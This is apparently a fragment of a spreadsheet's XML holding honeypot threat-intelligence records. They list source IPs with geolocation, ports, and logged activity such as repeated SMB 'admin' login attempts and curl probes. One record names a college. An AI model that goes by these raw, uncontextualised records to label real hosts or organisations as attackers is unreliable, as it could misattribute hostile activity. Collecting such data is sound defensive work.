    <t>SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H16</t>
  </si>
  <si>
    <t>::ffff:dc86:413</t>
  </si>
  <si>
    <t>96b9743310878873a21c51fe95bc7026</t>
  </si>
  <si>
    <t>220.133.28.97</t>
  </si>
  <si>
    <t>220-133-28-97.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H21</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;49214&amp;&amp;23&amp;&amp;80&amp;&amp;54206&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc85:1c61</t>
  </si>
  <si>
    <t>64a5e782c8bc358612f0a9d7f3ac2a06</t>
  </si>
  <si>
    <t>189.237.215.18</t>
  </si>
  <si>
    <t>CHH</t>
  </si>
  <si>
    <t>Chihuahua</t>
  </si>
  <si>
    <t>Cuauhtémoc Municipality</t>
  </si>
  <si>
    <t>Anáhuac</t>
  </si>
  <si>
    <t>4018543</t>
  </si>
  <si>
    <t>28.484</t>
  </si>
  <si>
    <t>-106.747</t>
  </si>
  <si>
    <t>::ffff:bded:d712</t>
  </si>
  <si>
    <t>b81fe05b8ae57223d8d3e050486c00ef</t>
  </si>
  <si>
    <t>202.168.87.137</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H37&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_PJL_H47&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_SSH_H16&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1080&amp;&amp;443&amp;&amp;9100&amp;&amp;5900&amp;&amp;22&amp;&amp;389&amp;&amp;56315&amp;&amp;19109&amp;&amp;1433</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,58555)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,58561)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,59291)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,42374)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,58474)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,5892)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,53050)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,53066)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,21715)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,33887)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,43664)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,52629)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,47928)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,47943)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,48235)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,59834)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,60663)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,55311)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,54020)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,54837)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,55256)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,62468)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,62791)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,63306)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,63697)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,64078)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,64608)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,64987)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,65438)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,49540)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,59419)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,44852)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,50893)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,51316)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,44814)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,52818)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,54736)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,55150)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,55621)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,56053)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,11978)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,56942)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,57333)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,57737)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,58174)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,58601)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,59940)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,60391)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,35086)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,61307)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,61965)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,62532)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,63051)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,63732)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,64054)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,64493)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (admin,)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,64974)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,29277)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,29294)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,29520)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,37085)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,37316)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,55102)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,60022)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,60104)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (202.168.87.137,61206)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:caa8:5789</t>
  </si>
  <si>
    <t>5fd1274fb3ce598f0e72aa0b4b15f2b2</t>
  </si>
  <si>
    <t>59.126.41.64</t>
  </si>
  <si>
    <t>59-126-41-64.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H16</t>
  </si>
  <si>
    <t>23&amp;&amp;18366&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:2940</t>
  </si>
  <si>
    <t>a75ba5b135e1cbf87ab2306227412a62</t>
  </si>
  <si>
    <t>203.115.96.195</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_SMB_H2</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;1433&amp;&amp;58047&amp;&amp;445&amp;&amp;57917&amp;&amp;58337</t>
  </si>
  <si>
    <t>Maharaja Agarsen College</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,53745)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,61305)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,61307)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,63739)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,50964)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,50989)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,56020)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,57917)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,58337)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,54947)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,54949)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,57379)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,57578)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,57588)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,60021)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,53591)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,53594)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,65452)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,65464)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,51672)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,49298)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,49299)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,51939)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,65393)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,56752)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,56801)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,60577)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,54298)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,54326)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,57005)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,55302)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,55313)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,59965)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,60941)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,60953)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,63706)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,58863)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,59285)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,52470)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,54974)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,58541)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,58574)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,63174)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,63311)}&amp;&amp;{Data_SMB:Incoming connection (203.115.96.195,65276)}</t>
  </si>
  <si>
    <t>::ffff:cb73:60c3</t>
  </si>
  <si>
    <t>034056fc28be1378686c4529f5587645</t>
  </si>
  <si>
    <t>157.66.147.95</t>
  </si>
  <si>
    <t>Talegaon Dābhāde (Tukaram Nagar)</t>
  </si>
  <si>
    <t>410506</t>
  </si>
  <si>
    <t>18.7168</t>
  </si>
  <si>
    <t>73.6778</t>
  </si>
  <si>
    <t>152499</t>
  </si>
  <si>
    <t>INFINITYLINK COMMUNICATIONS PRIVATE LIMITED</t>
  </si>
  <si>
    <t>Infinitylink Communications Private Limited</t>
  </si>
  <si>
    <t>2024-04-19</t>
  </si>
  <si>
    <t>SUNILBB</t>
  </si>
  <si>
    <t>::ffff:9d42:935f</t>
  </si>
  <si>
    <t>2bab06d8c0730aa65ee9a2c12c268b31</t>
  </si>
  <si>
    <t>46.118.62.156</t>
  </si>
  <si>
    <t>::ffff:2e76:3e9c</t>
  </si>
  <si>
    <t>e3d314073e20fdaae3fbf69e8eae8265</t>
  </si>
  <si>
    <t>160.176.26.198</t>
  </si>
  <si>
    <t>Agadir-Ida-ou-Tnan</t>
  </si>
  <si>
    <t>Agadir</t>
  </si>
  <si>
    <t>2561668</t>
  </si>
  <si>
    <t>30.4202</t>
  </si>
  <si>
    <t>-9.59815</t>
  </si>
  <si>
    <t>::ffff:a0b0:1ac6</t>
  </si>
  <si>
    <t>75537a3b10314a6f9f9204a90f2f72d4</t>
  </si>
  <si>
    <t>61.2.56.216</t>
  </si>
  <si>
    <t>::ffff:3d02:38d8</t>
  </si>
  <si>
    <t>a3c3531912af3524e26e369634626c3b</t>
  </si>
  <si>
    <t>49.213.234.141</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IMAP_H3&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;57800&amp;&amp;23&amp;&amp;43103&amp;&amp;43111&amp;&amp;9100&amp;&amp;80&amp;&amp;59120&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:31d5:ea8d</t>
  </si>
  <si>
    <t>1f721b12a1f34bbb13fd163591df8835</t>
  </si>
  <si>
    <t>59.126.129.45</t>
  </si>
  <si>
    <t>59-126-129-45.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H26&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;9100&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:3b7e:812d</t>
  </si>
  <si>
    <t>ebf926de77b6cd4d06926d8f35875f7d</t>
  </si>
  <si>
    <t>138.199.21.231</t>
  </si>
  <si>
    <t>Cdnext TYO</t>
  </si>
  <si>
    <t>1990-05-23</t>
  </si>
  <si>
    <t>::ffff:8ac7:15e7</t>
  </si>
  <si>
    <t>5f90f35699fcf3629234da2fb8425c2d</t>
  </si>
  <si>
    <t>146.196.45.195</t>
  </si>
  <si>
    <t>2016-03-08</t>
  </si>
  <si>
    <t>::ffff:92c4:2dc3</t>
  </si>
  <si>
    <t>b4b60ff798cd27479199feb14b6c0704</t>
  </si>
  <si>
    <t>118.167.156.88</t>
  </si>
  <si>
    <t>::ffff:76a7:9c58</t>
  </si>
  <si>
    <t>1377959ca0c0179a2c528cecb58eea24</t>
  </si>
  <si>
    <t>59.126.63.48</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-126-63-48.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_RDP_H37&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H37</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;80&amp;&amp;3389&amp;&amp;15803&amp;&amp;50720&amp;&amp;13036&amp;&amp;9100&amp;&amp;7453</t>
  </si>
  <si>
